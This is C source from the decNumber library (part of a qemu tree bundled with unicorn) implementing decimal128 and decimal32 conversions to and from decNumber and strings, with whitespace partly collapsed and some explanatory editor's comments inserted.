*/ /* ------------------------------------------------------------------ */ decNumber * decimal128ToNumber(const decimal128 *d128, decNumber *dn) { uInt msd; /* coefficient MSD */ uInt exp; /* exponent top two bits */ uInt comb; /* combination field */ const uInt *pu; /* work */ Int need; /* .. */ uInt sourar[4]; /* source 128-bit */ #define sourhi sourar[3] /* name the word with the sign */ #define sourmh sourar[2] /* and the mid-high word */ #define sourml sourar[1] /* and the mod-low word */ #define sourlo sourar[0] /* and the lowest word */ /* load source from storage; this is endian */ pu=(const uInt *)d128->bytes; /* overlay */ if (DECLITEND) { sourlo=pu[0]; /* directly load the low int */ sourml=pu[1]; /* then the mid-low */ sourmh=pu[2]; /* then the mid-high */ sourhi=pu[3]; /* then the high int */ } else { sourhi=pu[0]; /* directly load the high int */ sourmh=pu[1]; /* then the mid-high */ sourml=pu[2]; /* then the mid-low */ sourlo=pu[3]; /* then the low int */ } comb=(sourhi>>26)&0x1f; /* combination field */ decNumberZero(dn); /* clean number */ if (sourhi&0x80000000) dn->bits=DECNEG; /* set sign if negative */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { /* is a special */ if (msd==0) { dn->bits|=DECINF; return dn; /* no coefficient needed */ } else if (sourhi&0x02000000) dn->bits|=DECSNAN; else dn->bits|=DECNAN; msd=0; /* no top digit */ } else { /* is a finite number */ dn->exponent=(exp<<12)+((sourhi>>14)&0xfff)-DECIMAL128_Bias; /* unbiased */ } /* get the coefficient */ sourhi&=0x00003fff; /* clean coefficient continuation */ if (msd) { /* non-zero msd */ sourhi|=msd<<14; /* prefix to coefficient */ need=12; /* process 12 declets */ } else { /* msd=0 */ if (sourhi) need=11; /* declets to process */ else if (sourmh) need=10; else if (sourml) need=7; else if (sourlo) need=4; else return dn; /* easy: coefficient is 0 */ } /*msd=0 */ decDigitsFromDPD(dn, sourar, need); /* process declets */ /* decNumberShow(dn); */ return dn; } /* decimal128ToNumber */ /* ------------------------------------------------------------------ */ /* to-scientific-string -- conversion to numeric string */ /* to-engineering-string -- conversion to numeric string */ /* */ /* decimal128ToString(d128, string); */ /* decimal128ToEngString(d128, string); */ /* */ /* d128 is the decimal128 format number to convert */ /* string is the string where the result will be laid out */ /* */ /* string must be at least 24 characters */ /* */ /* No error is possible, and no status can be set. */ /* ------------------------------------------------------------------ */ char * decimal128ToEngString(const decimal128 *d128, char *string){ decNumber dn; /* work */ decimal128ToNumber(d128, &dn); decNumberToEngString(&dn, string); return string; } /* decimal128ToEngString */ char * decimal128ToString(const decimal128 *d128, char *string){ uInt msd; /* coefficient MSD */ Int exp; /* exponent top two bits or full */ uInt comb; /* combination field */ char *cstart; /* coefficient start */ char *c; /* output pointer in string */ const uInt *pu; /* work */ char *s, *t; /* .. (source, target) */ Int dpd; /* .. */ Int pre, e; /* .. */ const uByte *u; /* .. 
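/* ------------------------------------------------------------------ */
/* [Editor's note, added for clarity] decimal128 splits its 128 bits  */
/* as 1 sign, 5 combination, 12 exponent continuation and 110 bits of */
/* coefficient continuation (11 declets = 33 digits; the 34th, most   */
/* significant digit rides in the combination field).  In the high    */
/* word that leaves 32-1-5-12 = 14 coefficient bits, which is why the */
/* code above masks with 0x00003fff; the other three words are pure   */
/* declet data.                                                       */
/* ------------------------------------------------------------------ */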
*/ uInt sourar[4]; /* source 128-bit */ #define sourhi sourar[3] /* name the word with the sign */ #define sourmh sourar[2] /* and the mid-high word */ #define sourml sourar[1] /* and the mod-low word */ #define sourlo sourar[0] /* and the lowest word */ /* load source from storage; this is endian */ pu=(const uInt *)d128->bytes; /* overlay */ if (DECLITEND) { sourlo=pu[0]; /* directly load the low int */ sourml=pu[1]; /* then the mid-low */ sourmh=pu[2]; /* then the mid-high */ sourhi=pu[3]; /* then the high int */ } else { sourhi=pu[0]; /* directly load the high int */ sourmh=pu[1]; /* then the mid-high */ sourml=pu[2]; /* then the mid-low */ sourlo=pu[3]; /* then the low int */ } c=string; /* where result will go */ if (((Int)sourhi)<0) *c++='-'; /* handle sign */ comb=(sourhi>>26)&0x1f; /* combination field */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { if (msd==0) { /* infinity */ strcpy(c, "Inf"); strcpy(c+3, "inity"); return string; /* easy */ } if (sourhi&0x02000000) *c++='s'; /* sNaN */ strcpy(c, "NaN"); /* complete word */ c+=3; /* step past */ if (sourlo==0 && sourml==0 && sourmh==0 && (sourhi&0x0003ffff)==0) return string; /* zero payload */ /* otherwise drop through to add integer; set correct exp */ exp=0; msd=0; /* setup for following code */ } else exp=(exp<<12)+((sourhi>>14)&0xfff)-DECIMAL128_Bias; /* unbiased */ /* convert 34 digits of significand to characters */ cstart=c; /* save start of coefficient */ if (msd) *c++='0'+(char)msd; /* non-zero most significant digit */ /* Now decode the declets. After extracting each one, it is */ /* decoded to binary and then to a 4-char sequence by table lookup; */ /* the 4-chars are a 1-char length (significant digits, except 000 */ /* has length 0). This allows us to left-align the first declet */ /* with non-zero content, then remaining ones are full 3-char */ /* length. We use fixed-length memcpys because variable-length */ /* causes a subroutine call in GCC. (These are length 4 for speed */ /* and are safe because the array has an extra terminator byte.) */ #define dpd2char u=&BIN2CHAR[DPD2BIN[dpd]*4]; \ if (c!=cstart) {memcpy(c, u+1, 4); c+=3;} \ else if (*u) {memcpy(c, u+4-*u, 4); c+=*u;} dpd=(sourhi>>4)&0x3ff; /* declet 1 */ dpd2char; dpd=((sourhi&0xf)<<6) | (sourmh>>26); /* declet 2 */ dpd2char; dpd=(sourmh>>16)&0x3ff; /* declet 3 */ dpd2char; dpd=(sourmh>>6)&0x3ff; /* declet 4 */ dpd2char; dpd=((sourmh&0x3f)<<4) | (sourml>>28); /* declet 5 */ dpd2char; dpd=(sourml>>18)&0x3ff; /* declet 6 */ dpd2char; dpd=(sourml>>8)&0x3ff; /* declet 7 */ dpd2char; dpd=((sourml&0xff)<<2) | (sourlo>>30); /* declet 8 */ dpd2char; dpd=(sourlo>>20)&0x3ff; /* declet 9 */ dpd2char; dpd=(sourlo>>10)&0x3ff; /* declet 10 */ dpd2char; dpd=(sourlo)&0x3ff; /* declet 11 */ dpd2char; if (c==cstart) *c++='0'; /* all zeros -- make 0 */ if (exp==0) { /* integer or NaN case -- easy */ *c='\0'; /* terminate */ return string; } /* non-0 exponent */ e=0; /* assume no E */ pre=c-cstart+exp; /* [here, pre-exp is the digits count (==1 for zero)] */ if (exp>0 || pre<-5) { /* need exponential form */ e=pre-1; /* calculate E value */ pre=1; /* assume one digit before '.' */ } /* exponential form */ /* modify the coefficient, adding 0s, '.', and E+nn as needed */ s=c-1; /* source (LSD) */ if (pre>0) { /* ddd.ddd (plain), perhaps with E */ char *dotat=cstart+pre; if (dotat<c) { /* if embedded dot needed... 
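/* ------------------------------------------------------------------ */
/* [Editor's worked example, not library code] Each BIN2CHAR group is */
/* four bytes: a length byte (significant digits, 0 for "000") and    */
/* the three digit characters.  For binary value 37 the group is      */
/* {2,'0','3','7'}, so the dpd2char macro used above copies "037"     */
/* (from u+1) for an interior declet but only "37" (from u+4-*u) for  */
/* the leading one.  The fixed memcpy of 4 may touch the next group's */
/* length byte, which is why the table holds 4001 bytes, not 4000.    */
/* ------------------------------------------------------------------ */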
*/ t=c; /* target */ for (; s>=dotat; s--, t--) *t=*s; /* open the gap; leave t at gap */ *t='.'; /* insert the dot */ c++; /* length increased by one */ } /* finally add the E-part, if needed; it will never be 0, and has */ /* a maximum length of 4 digits */ if (e!=0) { *c++='E'; /* starts with E */ *c++='+'; /* assume positive */ if (e<0) { *(c-1)='-'; /* oops, need '-' */ e=-e; /* uInt, please */ } if (e<1000) { /* 3 (or fewer) digits case */ u=&BIN2CHAR[e*4]; /* -> length byte */ memcpy(c, u+4-*u, 4); /* copy fixed 4 characters [is safe] */ c+=*u; /* bump pointer appropriately */ } else { /* 4-digits */ Int thou=((e>>3)*1049)>>17; /* e/1000 */ Int rem=e-(1000*thou); /* e%1000 */ *c++='0'+(char)thou; u=&BIN2CHAR[rem*4]; /* -> length byte */ memcpy(c, u+1, 4); /* copy fixed 3+1 characters [is safe] */ c+=3; /* bump pointer, always 3 digits */ } } *c='\0'; /* add terminator */ /*printf("res %s\n", string); */ return string; } /* pre>0 */ /* -5<=pre<=0: here for plain 0.ddd or 0.000ddd forms (can never have E) */ t=c+1-pre; *(t+1)='\0'; /* can add terminator now */ for (; s>=cstart; s--, t--) *t=*s; /* shift whole coefficient right */ c=cstart; *c++='0'; /* always starts with 0. */ *c++='.'; for (; pre<0; pre++) *c++='0'; /* add any 0's after '.' */ /*printf("res %s\n", string); */ return string; } /* decimal128ToString */ /* ------------------------------------------------------------------ */ /* to-number -- conversion from numeric string */ /* */ /* decimal128FromString(result, string, set); */ /* */ /* result is the decimal128 format number which gets the result of */ /* the conversion */ /* *string is the character string which should contain a valid */ /* number (which may be a special value) */ /* set is the context */ /* */ /* The context is supplied to this routine is used for error handling */ /* (setting of status and traps) and for the rounding mode, only. */ /* If an error occurs, the result will be a valid decimal128 NaN. */ /* ------------------------------------------------------------------ */ decimal128 * decimal128FromString(decimal128 *result, const char *string, decContext *set) { decContext dc; /* work */ decNumber dn; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL128); /* no traps, please */ dc.round=set->round; /* use supplied rounding */ decNumberFromString(&dn, string, &dc); /* will round if needed */ decimal128FromNumber(result, &dn, &dc); if (dc.status!=0) { /* something happened */ decContextSetStatus(set, dc.status); /* .. pass it on */ } return result; } /* decimal128FromString */ /* ------------------------------------------------------------------ */ /* decimal128IsCanonical -- test whether encoding is canonical */ /* d128 is the source decimal128 */ /* returns 1 if the encoding of d128 is canonical, 0 otherwise */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uint32_t decimal128IsCanonical(const decimal128 *d128) { decNumber dn; /* work */ decimal128 canon; /* .. */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL128); decimal128ToNumber(d128, &dn); decimal128FromNumber(&canon, &dn, &dc);/* canon will now be canonical */ return memcmp(d128, &canon, DECIMAL128_Bytes)==0; } /* decimal128IsCanonical */ /* ------------------------------------------------------------------ */ /* decimal128Canonical -- copy an encoding, ensuring it is canonical */ /* d128 is the source decimal128 */ /* result is the target (may be the same decimal128) */ /* returns result */ /* No error is possible. 
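/* ------------------------------------------------------------------ */
/* [Editor's note, not library code] The 4-digit exponent split above */
/* uses ((e>>3)*1049)>>17 for e/1000: e/1000 = (e/8)/125, and         */
/* 1049/2**17 sits just above 1/125, so the floored product matches   */
/* exact division for every exponent this path can print (at most 4   */
/* digits for decimal128).  A brute-force check of the claim:         */
/*                                                                    */
/*   Int e;                                                           */
/*   for (e=0; e<=9999; e++)                                          */
/*     assert((((e>>3)*1049)>>17) == e/1000);                         */
/* ------------------------------------------------------------------ */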
*/
/* ------------------------------------------------------------------ */
decimal128 * decimal128Canonical(decimal128 *result, const decimal128 *d128) {
  decNumber dn;                             /* work */
  decContext dc;                            /* .. */
  decContextDefault(&dc, DEC_INIT_DECIMAL128);
  decimal128ToNumber(d128, &dn);
  decimal128FromNumber(result, &dn, &dc);/* result will now be canonical */
  return result;
  } /* decimal128Canonical */

#if DECTRACE || DECCHECK
/* Macros for accessing decimal128 fields.  These assume the argument
   is a reference (pointer) to the decimal128 structure, and the
   decimal128 is in network byte order (big-endian) */
/* Get sign */
#define decimal128Sign(d) ((unsigned)(d)->bytes[0]>>7)

/* Get combination field */
#define decimal128Comb(d) (((d)->bytes[0] & 0x7c)>>2)

/* Get exponent continuation [does not remove bias] */
#define decimal128ExpCon(d) ((((d)->bytes[0] & 0x03)<<10)          \
  | ((unsigned)(d)->bytes[1]<<2)                                   \
  | ((unsigned)(d)->bytes[2]>>6))

/* Set sign [this assumes sign previously 0] */
#define decimal128SetSign(d, b) {                                  \
  (d)->bytes[0]|=((unsigned)(b)<<7);}

/* Set exponent continuation [does not apply bias] */
/* This assumes range has been checked and exponent previously 0;  */
/* type of exponent must be unsigned                               */
#define decimal128SetExpCon(d, e) {                                \
  (d)->bytes[0]|=(uint8_t)((e)>>10);                               \
  (d)->bytes[1] =(uint8_t)(((e)&0x3fc)>>2);                        \
  (d)->bytes[2]|=(uint8_t)(((e)&0x03)<<6);}

/* ------------------------------------------------------------------ */
/* decimal128Show -- display a decimal128 in hexadecimal [debug aid]  */
/*   d128 -- the number to show                                       */
/* ------------------------------------------------------------------ */
/* Also shows sign/comb/expcon fields extracted                       */
void decimal128Show(const decimal128 *d128) {
  char buf[DECIMAL128_Bytes*2+1];
  Int i, j=0;

  if (DECLITEND) {
    for (i=0; i<DECIMAL128_Bytes; i++, j+=2) {
      sprintf(&buf[j], "%02x", d128->bytes[15-i]);
      }
    printf(" D128> %s [S:%d Cb:%02x Ec:%02x] LittleEndian\n", buf,
           d128->bytes[15]>>7, (d128->bytes[15]>>2)&0x1f,
           ((d128->bytes[15]&0x3)<<10)|(d128->bytes[14]<<2)|
           (d128->bytes[13]>>6));
    }
   else {
    for (i=0; i<DECIMAL128_Bytes; i++, j+=2) {
      sprintf(&buf[j], "%02x", d128->bytes[i]);
      }
    printf(" D128> %s [S:%d Cb:%02x Ec:%02x] BigEndian\n", buf,
           decimal128Sign(d128), decimal128Comb(d128),
           decimal128ExpCon(d128));
    }
  } /* decimal128Show */
#endif
unicorn-2.1.1/qemu/libdecnumber/dpd/decimal32.c 0000664 0000000 0000000 00000045730 14675241067 0021275 0 ustar 00root root
/* Decimal 32-bit format module for the decNumber C Library.
   Copyright (C) 2005, 2007 Free Software Foundation, Inc.
   Contributed by IBM Corporation.  Author Mike Cowlishaw.

   This file is part of GCC.

   GCC is free software; you can redistribute it and/or modify it under
   the terms of the GNU General Public License as published by the Free
   Software Foundation; either version 2, or (at your option) any later
   version.
In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 32-bit format module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for decimal32 format numbers. */ /* Conversions are supplied to and from decNumber and String. */ /* */ /* This is used when decNumber provides operations, either for all */ /* operations or as a proxy between decNumber and decSingle. */ /* */ /* Error handling is the same as decNumber (qv.). */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #define DECNUMDIGITS 7 /* make decNumbers with space for 7 */ #include "libdecnumber/decNumber.h" #include "libdecnumber/decNumberLocal.h" #include "libdecnumber/dpd/decimal32.h" /* Utility tables and routines [in decimal64.c] */ extern const uInt COMBEXP[32], COMBMSD[32]; extern const uByte BIN2CHAR[4001]; extern void decDigitsToDPD(const decNumber *, uInt *, Int); extern void decDigitsFromDPD(decNumber *, const uInt *, Int); #if DECTRACE || DECCHECK void decimal32Show(const decimal32 *); /* for debug */ extern void decNumberShow(const decNumber *); /* .. */ #endif /* Useful macro */ /* Clear a structure (e.g., a decNumber) */ #define DEC_clear(d) memset(d, 0, sizeof(*d)) /* ------------------------------------------------------------------ */ /* decimal32FromNumber -- convert decNumber to decimal32 */ /* */ /* ds is the target decimal32 */ /* dn is the source number (assumed valid) */ /* set is the context, used only for reporting errors */ /* */ /* The set argument is used only for status reporting and for the */ /* rounding mode (used if the coefficient is more than DECIMAL32_Pmax */ /* digits or an overflow is detected). If the exponent is out of the */ /* valid range then Overflow or Underflow will be raised. */ /* After Underflow a subnormal result is possible. */ /* */ /* DEC_Clamped is set if the number has to be 'folded down' to fit, */ /* by reducing its exponent and multiplying the coefficient by a */ /* power of ten, or if the exponent on a zero had to be clamped. */ /* ------------------------------------------------------------------ */ decimal32 * decimal32FromNumber(decimal32 *d32, const decNumber *dn, decContext *set) { uInt status=0; /* status accumulator */ Int ae; /* adjusted exponent */ decNumber dw; /* work */ decContext dc; /* .. */ uInt *pu; /* .. */ uInt comb, exp; /* .. 
*/ uInt targ=0; /* target 32-bit */ /* If the number has too many digits, or the exponent could be */ /* out of range then reduce the number under the appropriate */ /* constraints. This could push the number to Infinity or zero, */ /* so this check and rounding must be done before generating the */ /* decimal32] */ ae=dn->exponent+dn->digits-1; /* [0 if special] */ if (dn->digits>DECIMAL32_Pmax /* too many digits */ || ae>DECIMAL32_Emax /* likely overflow */ || ae<DECIMAL32_Emin) { /* likely underflow */ decContextDefault(&dc, DEC_INIT_DECIMAL32); /* [no traps] */ dc.round=set->round; /* use supplied rounding */ decNumberPlus(&dw, dn, &dc); /* (round and check) */ /* [this changes -0 to 0, so enforce the sign...] */ dw.bits|=dn->bits&DECNEG; status=dc.status; /* save status */ dn=&dw; /* use the work number */ } /* maybe out of range */ if (dn->bits&DECSPECIAL) { /* a special value */ if (dn->bits&DECINF) targ=DECIMAL_Inf<<24; else { /* sNaN or qNaN */ if ((*dn->lsu!=0 || dn->digits>1) /* non-zero coefficient */ && (dn->digits<DECIMAL32_Pmax)) { /* coefficient fits */ decDigitsToDPD(dn, &targ, 0); } if (dn->bits&DECNAN) targ|=DECIMAL_NaN<<24; else targ|=DECIMAL_sNaN<<24; } /* a NaN */ } /* special */ else { /* is finite */ if (decNumberIsZero(dn)) { /* is a zero */ /* set and clamp exponent */ if (dn->exponent<-DECIMAL32_Bias) { exp=0; /* low clamp */ status|=DEC_Clamped; } else { exp=dn->exponent+DECIMAL32_Bias; /* bias exponent */ if (exp>DECIMAL32_Ehigh) { /* top clamp */ exp=DECIMAL32_Ehigh; status|=DEC_Clamped; } } comb=(exp>>3) & 0x18; /* msd=0, exp top 2 bits .. */ } else { /* non-zero finite number */ uInt msd; /* work */ Int pad=0; /* coefficient pad digits */ /* the dn is known to fit, but it may need to be padded */ exp=(uInt)(dn->exponent+DECIMAL32_Bias); /* bias exponent */ if (exp>DECIMAL32_Ehigh) { /* fold-down case */ pad=exp-DECIMAL32_Ehigh; exp=DECIMAL32_Ehigh; /* [to maximum] */ status|=DEC_Clamped; } /* fastpath common case */ if (DECDPUN==3 && pad==0) { targ=BIN2DPD[dn->lsu[0]]; if (dn->digits>3) targ|=(uInt)(BIN2DPD[dn->lsu[1]])<<10; msd=(dn->digits==7 ? dn->lsu[2] : 0); } else { /* general case */ decDigitsToDPD(dn, &targ, pad); /* save and clear the top digit */ msd=targ>>20; targ&=0x000fffff; } /* create the combination field */ if (msd>=8) comb=0x18 | ((exp>>5) & 0x06) | (msd & 0x01); else comb=((exp>>3) & 0x18) | msd; } targ|=comb<<26; /* add combination field .. */ targ|=(exp&0x3f)<<20; /* .. and exponent continuation */ } /* finite */ if (dn->bits&DECNEG) targ|=0x80000000; /* add sign bit */ /* now write to storage; this is endian */ pu=(uInt *)d32->bytes; /* overlay */ *pu=targ; /* directly store the int */ if (status!=0) decContextSetStatus(set, status); /* pass on status */ /* decimal32Show(d32); */ return d32; } /* decimal32FromNumber */ /* ------------------------------------------------------------------ */ /* decimal32ToNumber -- convert decimal32 to decNumber */ /* d32 is the source decimal32 */ /* dn is the target number, with appropriate space */ /* No error is possible. 
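/* ------------------------------------------------------------------ */
/* [Editor's worked example, not library code] The DECDPUN==3 fast    */
/* path above works because each Unit then holds exactly one declet's */
/* worth of digits (0-999).  Packing 1234567 (units {567,234,1}):     */
/*                                                                    */
/*   targ  = BIN2DPD[567];          declet 1, bits 0-9                */
/*   targ |= BIN2DPD[234] << 10;    declet 2, bits 10-19              */
/*   msd   = 1;                     travels in the combination field  */
/*                                                                    */
/* so no digit-by-digit repacking is needed.                          */
/* ------------------------------------------------------------------ */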
*/ /* ------------------------------------------------------------------ */ decNumber * decimal32ToNumber(const decimal32 *d32, decNumber *dn) { uInt msd; /* coefficient MSD */ uInt exp; /* exponent top two bits */ uInt comb; /* combination field */ uInt sour; /* source 32-bit */ const uInt *pu; /* work */ /* load source from storage; this is endian */ pu=(const uInt *)d32->bytes; /* overlay */ sour=*pu; /* directly load the int */ comb=(sour>>26)&0x1f; /* combination field */ decNumberZero(dn); /* clean number */ if (sour&0x80000000) dn->bits=DECNEG; /* set sign if negative */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { /* is a special */ if (msd==0) { dn->bits|=DECINF; return dn; /* no coefficient needed */ } else if (sour&0x02000000) dn->bits|=DECSNAN; else dn->bits|=DECNAN; msd=0; /* no top digit */ } else { /* is a finite number */ dn->exponent=(exp<<6)+((sour>>20)&0x3f)-DECIMAL32_Bias; /* unbiased */ } /* get the coefficient */ sour&=0x000fffff; /* clean coefficient continuation */ if (msd) { /* non-zero msd */ sour|=msd<<20; /* prefix to coefficient */ decDigitsFromDPD(dn, &sour, 3); /* process 3 declets */ return dn; } /* msd=0 */ if (!sour) return dn; /* easy: coefficient is 0 */ if (sour&0x000ffc00) /* need 2 declets? */ decDigitsFromDPD(dn, &sour, 2); /* process 2 declets */ else decDigitsFromDPD(dn, &sour, 1); /* process 1 declet */ return dn; } /* decimal32ToNumber */ /* ------------------------------------------------------------------ */ /* to-scientific-string -- conversion to numeric string */ /* to-engineering-string -- conversion to numeric string */ /* */ /* decimal32ToString(d32, string); */ /* decimal32ToEngString(d32, string); */ /* */ /* d32 is the decimal32 format number to convert */ /* string is the string where the result will be laid out */ /* */ /* string must be at least 24 characters */ /* */ /* No error is possible, and no status can be set. */ /* ------------------------------------------------------------------ */ char * decimal32ToEngString(const decimal32 *d32, char *string){ decNumber dn; /* work */ decimal32ToNumber(d32, &dn); decNumberToEngString(&dn, string); return string; } /* decimal32ToEngString */ char * decimal32ToString(const decimal32 *d32, char *string){ uInt msd; /* coefficient MSD */ Int exp; /* exponent top two bits or full */ uInt comb; /* combination field */ char *cstart; /* coefficient start */ char *c; /* output pointer in string */ const uInt *pu; /* work */ const uByte *u; /* .. */ char *s, *t; /* .. (source, target) */ Int dpd; /* .. */ Int pre, e; /* .. */ uInt sour; /* source 32-bit */ /* load source from storage; this is endian */ pu=(const uInt *)d32->bytes; /* overlay */ sour=*pu; /* directly load the int */ c=string; /* where result will go */ if (((Int)sour)<0) *c++='-'; /* handle sign */ comb=(sour>>26)&0x1f; /* combination field */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. 
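/* ------------------------------------------------------------------ */
/* [Editor's worked example, not library code] Decoding is two table  */
/* lookups: comb=11101 (29) gives COMBEXP[29]=2 (exponent top bits    */
/* 10) and COMBMSD[29]=9, undoing the 11|ee|m escape form; comb=30    */
/* and 31 return COMBEXP==3, marking Infinity (msd 0) or NaN (msd 1). */
/* The tables themselves are defined in decimal64.c.                  */
/* ------------------------------------------------------------------ */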
*/ if (exp==3) { if (msd==0) { /* infinity */ strcpy(c, "Inf"); strcpy(c+3, "inity"); return string; /* easy */ } if (sour&0x02000000) *c++='s'; /* sNaN */ strcpy(c, "NaN"); /* complete word */ c+=3; /* step past */ if ((sour&0x000fffff)==0) return string; /* zero payload */ /* otherwise drop through to add integer; set correct exp */ exp=0; msd=0; /* setup for following code */ } else exp=(exp<<6)+((sour>>20)&0x3f)-DECIMAL32_Bias; /* unbiased */ /* convert 7 digits of significand to characters */ cstart=c; /* save start of coefficient */ if (msd) *c++='0'+(char)msd; /* non-zero most significant digit */ /* Now decode the declets. After extracting each one, it is */ /* decoded to binary and then to a 4-char sequence by table lookup; */ /* the 4-chars are a 1-char length (significant digits, except 000 */ /* has length 0). This allows us to left-align the first declet */ /* with non-zero content, then remaining ones are full 3-char */ /* length. We use fixed-length memcpys because variable-length */ /* causes a subroutine call in GCC. (These are length 4 for speed */ /* and are safe because the array has an extra terminator byte.) */ #define dpd2char u=&BIN2CHAR[DPD2BIN[dpd]*4]; \ if (c!=cstart) {memcpy(c, u+1, 4); c+=3;} \ else if (*u) {memcpy(c, u+4-*u, 4); c+=*u;} dpd=(sour>>10)&0x3ff; /* declet 1 */ dpd2char; dpd=(sour)&0x3ff; /* declet 2 */ dpd2char; if (c==cstart) *c++='0'; /* all zeros -- make 0 */ if (exp==0) { /* integer or NaN case -- easy */ *c='\0'; /* terminate */ return string; } /* non-0 exponent */ e=0; /* assume no E */ pre=c-cstart+exp; /* [here, pre-exp is the digits count (==1 for zero)] */ if (exp>0 || pre<-5) { /* need exponential form */ e=pre-1; /* calculate E value */ pre=1; /* assume one digit before '.' */ } /* exponential form */ /* modify the coefficient, adding 0s, '.', and E+nn as needed */ s=c-1; /* source (LSD) */ if (pre>0) { /* ddd.ddd (plain), perhaps with E */ char *dotat=cstart+pre; if (dotat<c) { /* if embedded dot needed... */ t=c; /* target */ for (; s>=dotat; s--, t--) *t=*s; /* open the gap; leave t at gap */ *t='.'; /* insert the dot */ c++; /* length increased by one */ } /* finally add the E-part, if needed; it will never be 0, and has */ /* a maximum length of 3 digits (E-101 case) */ if (e!=0) { *c++='E'; /* starts with E */ *c++='+'; /* assume positive */ if (e<0) { *(c-1)='-'; /* oops, need '-' */ e=-e; /* uInt, please */ } u=&BIN2CHAR[e*4]; /* -> length byte */ memcpy(c, u+4-*u, 4); /* copy fixed 4 characters [is safe] */ c+=*u; /* bump pointer appropriately */ } *c='\0'; /* add terminator */ /*printf("res %s\n", string); */ return string; } /* pre>0 */ /* -5<=pre<=0: here for plain 0.ddd or 0.000ddd forms (can never have E) */ t=c+1-pre; *(t+1)='\0'; /* can add terminator now */ for (; s>=cstart; s--, t--) *t=*s; /* shift whole coefficient right */ c=cstart; *c++='0'; /* always starts with 0. */ *c++='.'; for (; pre<0; pre++) *c++='0'; /* add any 0's after '.' 
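/* ------------------------------------------------------------------ */
/* [Editor's worked examples, not library code] for the layout choice */
/* made above (pre = digits before the decimal point, if plain):      */
/*                                                                    */
/*   coeff "123", exp -2  ->  pre  1  ->  "1.23"      (plain)         */
/*   coeff "123", exp -6  ->  pre -3  ->  "0.000123"  (plain, padded) */
/*   coeff "123", exp  1  ->  pre  4  ->  "1.23E+3"   (exp>0)         */
/*   coeff "123", exp -9  ->  pre -6  ->  "1.23E-7"   (pre<-5)        */
/* ------------------------------------------------------------------ */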
*/ /*printf("res %s\n", string); */ return string; } /* decimal32ToString */ /* ------------------------------------------------------------------ */ /* to-number -- conversion from numeric string */ /* */ /* decimal32FromString(result, string, set); */ /* */ /* result is the decimal32 format number which gets the result of */ /* the conversion */ /* *string is the character string which should contain a valid */ /* number (which may be a special value) */ /* set is the context */ /* */ /* The context is supplied to this routine is used for error handling */ /* (setting of status and traps) and for the rounding mode, only. */ /* If an error occurs, the result will be a valid decimal32 NaN. */ /* ------------------------------------------------------------------ */ decimal32 * decimal32FromString(decimal32 *result, const char *string, decContext *set) { decContext dc; /* work */ decNumber dn; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL32); /* no traps, please */ dc.round=set->round; /* use supplied rounding */ decNumberFromString(&dn, string, &dc); /* will round if needed */ decimal32FromNumber(result, &dn, &dc); if (dc.status!=0) { /* something happened */ decContextSetStatus(set, dc.status); /* .. pass it on */ } return result; } /* decimal32FromString */ /* ------------------------------------------------------------------ */ /* decimal32IsCanonical -- test whether encoding is canonical */ /* d32 is the source decimal32 */ /* returns 1 if the encoding of d32 is canonical, 0 otherwise */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uint32_t decimal32IsCanonical(const decimal32 *d32) { decNumber dn; /* work */ decimal32 canon; /* .. */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL32); decimal32ToNumber(d32, &dn); decimal32FromNumber(&canon, &dn, &dc);/* canon will now be canonical */ return memcmp(d32, &canon, DECIMAL32_Bytes)==0; } /* decimal32IsCanonical */ /* ------------------------------------------------------------------ */ /* decimal32Canonical -- copy an encoding, ensuring it is canonical */ /* d32 is the source decimal32 */ /* result is the target (may be the same decimal32) */ /* returns result */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decimal32 * decimal32Canonical(decimal32 *result, const decimal32 *d32) { decNumber dn; /* work */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL32); decimal32ToNumber(d32, &dn); decimal32FromNumber(result, &dn, &dc);/* result will now be canonical */ return result; } /* decimal32Canonical */ #if DECTRACE || DECCHECK /* Macros for accessing decimal32 fields. 
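/* ------------------------------------------------------------------ */
/* [Editor's usage sketch, not library code] A minimal round trip     */
/* through the conversions defined above; 24 characters is the buffer */
/* size the ToString contract asks for:                               */
/*                                                                    */
/*   decContext set;                                                  */
/*   decimal32  d32;                                                  */
/*   char       out[24];                                              */
/*   decContextDefault(&set, DEC_INIT_DECIMAL32);                     */
/*   decimal32FromString(&d32, "1.23", &set);   rounds to 7 digits    */
/*   decimal32ToString(&d32, out);              out is "1.23" again   */
/* ------------------------------------------------------------------ */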
These assume the argument is a reference (pointer) to the decimal32
   structure, and the decimal32 is in network byte order (big-endian) */
/* Get sign */
#define decimal32Sign(d) ((unsigned)(d)->bytes[0]>>7)

/* Get combination field */
#define decimal32Comb(d) (((d)->bytes[0] & 0x7c)>>2)

/* Get exponent continuation [does not remove bias] */
#define decimal32ExpCon(d) ((((d)->bytes[0] & 0x03)<<4)            \
  | ((unsigned)(d)->bytes[1]>>4))

/* Set sign [this assumes sign previously 0] */
#define decimal32SetSign(d, b) {                                   \
  (d)->bytes[0]|=((unsigned)(b)<<7);}

/* Set exponent continuation [does not apply bias] */
/* This assumes range has been checked and exponent previously 0;  */
/* type of exponent must be unsigned                               */
#define decimal32SetExpCon(d, e) {                                 \
